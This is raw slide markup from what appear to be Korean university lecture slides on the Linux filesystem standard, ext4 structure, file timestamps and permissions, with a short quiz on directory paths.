              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>교수소개</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>2021</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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7</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>해군사관학교 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>교수사관 전임</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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/Theory/T3/FSSTND </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 파일시스템 표준</a:t>
            </a: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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>lost+found</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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수행 중 파일시스템의 이상 유</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>무를 진단하고 복구하는 프로그램인 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="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ko-KR" altLang="en-US" sz="1000" b="0" i="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관리자 계정인 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>로 접속해야 디렉토리의 내용을 볼 수 있음</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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복구 프로그램인 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>fsck</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>에 의해 사용되는 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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/var</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:t>시스템에서 사용되는 동적인 파일</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                <a:t>변경되는 파일</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                <a:t>들 저장</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                <a:t>각종 시스템 로그 파일</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>tmp</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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프로그램 수행 과정에서의 임시 파일들 저장</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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임시 파일 저장 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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/opt</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>리눅스에서 제공되지 않는 프로그램을 추가로 설치할 경우 사용</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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프로그램 추가 설치 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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/Theory/T3/FSSTND</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 파일 시스템</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>표준</a:t>
            </a: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다음 퀴즈를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>맞추시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>웹</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Theory/T3/FSSTND </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 파일시스템 표준</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
              <a:t>리눅스 기본 명령어들을 보고 싶다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
              <a:t>리눅스 표준 계층구조 중 처음에 어떤 경로를 들어가야 하는가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
              <a:t>컴퓨터에 누가 접속했는지 기록을 보고 싶다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
              <a:t>리눅스 표준 계층구조 중 처음에 어떤 경로를 들어가야 하는가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
              <a:t>공유 라이브러리 디렉토리는 어떤 경로에 있는가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
              <a:t>사용자가 설치한 응용 패키지 프로그램은 보통 어느 경로에 저장되는가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
              <a:t>부팅 파일이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" err="1"/>
              <a:t>재대로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
              <a:t> 복구되었는지 확인하고 싶다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
              <a:t> 리눅스 표준 계층구조 중 처음에 어떤 경로를 들어가야 하는가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="120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a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A) /bin</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A) /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>vsr</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A) /lib</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A) /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A) /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>lost+found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  or /boot/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>lost_found</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Question )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:srgbClr val="F743BB"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600"/>
              <a:t> “passwd” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600"/>
              <a:t>파일의 경로를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" err="1"/>
              <a:t>찾으시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="120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/Theory/T3/Structure </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 파일시스템 구조</a:t>
            </a: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Virtual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>File System</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Theory/T3/Structure </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 파일시스템 구조 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>– Ext4</a:t>
            </a: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/Theory/T3/Structure </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Ext4 – Super Block</a:t>
            </a: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/Theory/T3/TimeStamp </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일 시스템 타임스탬프</a:t>
            </a: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ls(1) option</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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st_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a:t>각 파일마다 세 개의 시간 필드들이 커널에 의해 관리 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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 head, tail</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p>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영향을 미치지 않습니다</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변경됩니다</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/Theory/T3/Permission </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 파일시스템 권한</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>( Permission )</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>디렉토리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l  : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>링크</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-  : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     -        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       r-x       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r-x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          2       root     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    631968  Nov 17   08:28    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1">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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r  : read : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>읽기 가능  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w : write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 쓰기 가능  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x  : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>excute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행 가능  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-  : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>권한 없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>link</a:t>
